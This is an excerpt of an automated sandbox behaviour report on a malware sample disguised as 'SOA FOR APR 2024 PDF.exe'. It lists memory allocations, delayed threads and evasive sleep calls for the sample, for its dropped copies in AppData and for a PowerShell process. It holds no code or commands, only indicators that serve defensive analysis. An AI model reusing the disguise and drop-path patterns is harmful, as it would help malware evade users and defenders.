                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 7630000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 6F20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 8630000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 9630000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 9D30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: AD30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: BD30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: F00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 2810000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeMemory allocated: 4810000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 9B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 2530000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: A30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 6920000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 7920000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 7AA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 8AA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 9160000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 6920000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 2BC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 2E10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeMemory allocated: 2BC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 1490000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2E90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 2C50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 7510000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 8510000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 86A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 96A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 9D80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: AD80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: BD80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 1C60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 3480000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 1CD0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: CC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 28A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 27F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 6D40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 7D40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 7EC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 8EC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 9580000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: A580000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: B580000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 14F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 31C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory allocated: 51C0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199953Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199844Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199719Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199594Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199484Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199356Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199250Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199140Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1199031Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198922Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198813Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198703Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198594Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198484Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198375Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198266Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198156Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1198047Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1197938Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1197813Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1197688Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeThread delayed: delay time: 1197563Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1200000
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1199890
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1199781
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1199659
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1199525
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1199415
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1198938
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1197107
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196999
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196890
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196773
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196671
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196562
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196453
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196343
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196234
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196124
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1196014
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195906
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195793
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195687
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195577
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195468
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195359
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195247
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeThread delayed: delay time: 1195140
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199922
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199813
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199688
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199563
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199438
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199329
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199204
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199079
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198954
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198829
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198713
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198597
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198467
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198360
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198249
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198141
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198016
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197891
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197782
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197657
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197532
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197422
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197312
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197203
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199988
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199833
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199703
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199594
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199484
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199375
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199265
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199156
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199047
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198938
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198813
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198688
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198578
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198469
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198344
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198234
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198125
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198015
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197906
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197797
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197687
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197578
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197469
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3200Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5125Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWindow / User API: threadDelayed 2742Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWindow / User API: threadDelayed 7108Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeWindow / User API: threadDelayed 2266
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeWindow / User API: threadDelayed 7588
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow / User API: threadDelayed 2405
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow / User API: threadDelayed 7439
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow / User API: threadDelayed 5115
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow / User API: threadDelayed 4715
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 2276Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep count: 3200 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep count: 152 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7488Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -99871s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -99765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -99646s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -99515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -99406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -99268s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -99140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -99031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -98921s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -98812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -98703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -98593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -98484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -98374s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -98265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -98133s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -98015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -97906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -97796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -97687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -97578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -97468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -97359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -97249s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -97135s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -97031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -96921s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1199953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1199844s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1199719s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1199594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1199484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1199356s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1199250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1199140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1199031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1198922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1198813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1198703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1198594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1198484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1198375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1198266s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1198156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1198047s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1197938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1197813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1197688s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe TID: 7652Thread sleep time: -1197563s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7676Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -27670116110564310s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7900Thread sleep count: 2266 > 30
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -99875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7900Thread sleep count: 7588 > 30
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -99765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -99547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -99437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -99328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -99218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -99109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -99000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -98890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -98781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -98672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -98561s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -98453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -98344s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -98219s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -98109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -98000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -97888s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -97781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -97670s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -97561s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -97452s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -97343s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe TID: 7896Thread sleep time: -1200000s >= -30000s
